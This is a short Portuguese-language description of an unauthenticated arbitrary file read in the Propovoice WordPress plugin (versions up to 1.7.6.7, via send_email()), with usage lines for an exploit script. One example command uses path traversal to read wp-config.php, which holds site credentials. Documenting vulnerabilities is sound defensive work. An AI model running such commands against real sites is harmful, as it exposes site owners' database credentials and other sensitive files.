
Propovoice <= 1.7.6.7 - Leitura Arbitrária de Arquivos Não Autenticada
Propovoice <= 1.7.6.7 - Leitura Arbitrária de Arquivos sem Autenticação
O plugin Propovoice: All-in-One Client Management System para WordPress é vulnerável a Leitura Arbitrária de Arquivos em todas as versões até, e incluindo, a 1.7.6.7, por meio da função send_email(). Isso possibilita que atacantes não autenticados leiam o conteúdo de arquivos arbitrários no servidor, que podem conter informações sensíveis.
Usage: python3 cve-2025-8422-exploit.py <target_url> <email_recipient> [target_file]
Examples:
python3 cve-2025-8422-exploit.py https://example.com [email protected]
python3 cve-2025-8422-exploit.py https://example.com [email protected] /../../../wp-config.php